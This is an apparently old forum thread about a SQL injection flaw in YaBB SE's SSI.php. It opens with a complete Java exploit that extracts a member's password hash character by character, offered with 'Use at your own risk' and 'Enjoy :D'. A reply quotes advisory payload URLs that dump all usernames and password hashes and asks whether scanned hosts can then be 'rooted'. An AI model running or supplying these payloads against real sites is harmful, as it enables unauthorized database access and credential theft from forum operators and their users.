[GaLiaRePt]

http://www.security-...ploit/yabb.java
http://www.security-...040120-000.html

/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;

public class yabb {
public static void main(String[] args) throws Exception {

boolean lastChar = false;
String Key = "";

for ( int count=1; count <= 32; count++)
{
URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");

BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));

String inputLine;

inputLine = in.readLine();

int pos = inputLine.indexOf("action=im");
int pos2 = inputLine.indexOf(" ", pos + 11);

if ( pos < 0 )
{
System.out.println("ERROR: The server doesn't return any data");
System.exit(0);
}

String theNumber = inputLine.substring( pos + 11, pos2);

System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
in.close();
}
System.out.println("Hashed password : " + Key);
}
}

Enjoy :D

[BuzzDee]

hmm this seems interesting but i dont really understand it yet...

the second link says:


Technical Details:

the file SSI.php has a number of functions that return some information
about the status of the forum like recent topics, boards statistics and so
on. Functions welcome and recentTopics are vulnerable to SQL injection
because the parameter ID_MEMBER is not checked against malicious input.

Example:

http://vulnhost/yabb...&ID_MEMBER=1+OR
+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD
=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_
MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=
t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,
null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*

OR

http://vulnhost/yabb..._MEMBER=1+OR+1=
1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_
BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEM
BER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yab
bse_members+/*

those requests return a page showing all usernames and hashed passwords.

[General Discussion] test post by test January 01, 2001, 03:00:01 pm
[] admin by [hashed pass] January 01, 1970, 01:00:01 am
[] test_user by [hashed pass] January 01, 1970, 01:00:02 am





so if u scan a vulnerable host, type this link into internet explorer u get log/pass for mysql server? but whats so good about it? i mean can i root a server with that?? scanning with hscan in the past gave me a lot of mysql usernames and passes but i cant use them for rooting servers can i?

maybe i understood sth wrong...

buzz

[schnibble]

no u can't except if u have some mysql exploit.

btw. i downloaded yabbse 1.5.4 and installed it on my server, put that injection doesent work.

here is the result:

Notice: Undefined offset: 23 in c:\program files\apache group\apache\htdocs\yabbse\ssi.php on line 78

Notice: Undefined variable: faketruncation in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 737

Notice: Undefined variable: menusep in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 1321

Notice: Undefined variable: menusep in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 1322

Notice: Undefined variable: YaBBversion in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 1408

Notice: Undefined index: boardmod1 in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 1586

Notice: Undefined index: boardmod1 in c:\program files\apache group\apache\htdocs\yabbse\english.lng on line 1586

can anyone help me a bit with it?!?

thnx